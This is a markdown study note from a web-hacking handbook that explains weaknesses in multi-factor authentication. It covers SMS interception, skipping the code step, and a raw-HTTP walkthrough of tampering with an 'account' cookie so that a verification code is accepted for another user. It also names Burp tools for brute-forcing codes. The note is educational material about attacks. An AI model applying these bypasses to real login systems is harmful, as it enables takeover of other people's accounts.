handbook/tools/3.Web-Hacking/3.Business-Logic/Authentification-Vulnerability/Notes/2.Multi-factor-Authentication.md
2024-08-31 01:07:22 +02:00

1.5 KiB

Multi-Factor Authentication

Two-Factor Authentication Tokens

  • Some websites send a verification code via a dedicated device or app (such as Google Authenticator)
  • Other websites send a code via text message which is open to abuse Code is being transmitted via SMS rather than by the device itself Code can be intercepted via SIM swapping among other means

Bypassing Two-Factor Authentication

  • Try to go to "logged in pages" without entering the code -- you might be able to bypass MFA completely Flawed Two-Factor Verification Logic
  1. User logs in with normal creds
POST /login-steps/first
HTTP/1.1
Host: vulnerable-website.com
...
username=carlos&password=qwerty
  1. User is assigned a cookie that relates to their account, before being taken to the second step of the login process
HTTP/1.1 200 OK
Set-Cookie: account=carlos
GET /login-steps/second
HTTP/1.1
Cookie: account=carlos
  1. When submitting the verification code, the request uses this cookie to determine which account the user is trying to access
POST /login-steps/second
HTTP/1.1
Host: vulnerable-
website.com
Cookie: account=carlos
...
verification-code=123456
  1. You can change the "account" cookie to any username when submitting the code
POST /login-steps/second
HTTP/1.1
Host: vulnerable-
website.com
Cookie: account=victim-user
...
verification-code=123456

Brute-forcing 2FA Verification Codes

  • This can be automated by creating macros for Burp Intruder
  • This can also be done with the Turbo Intruder extension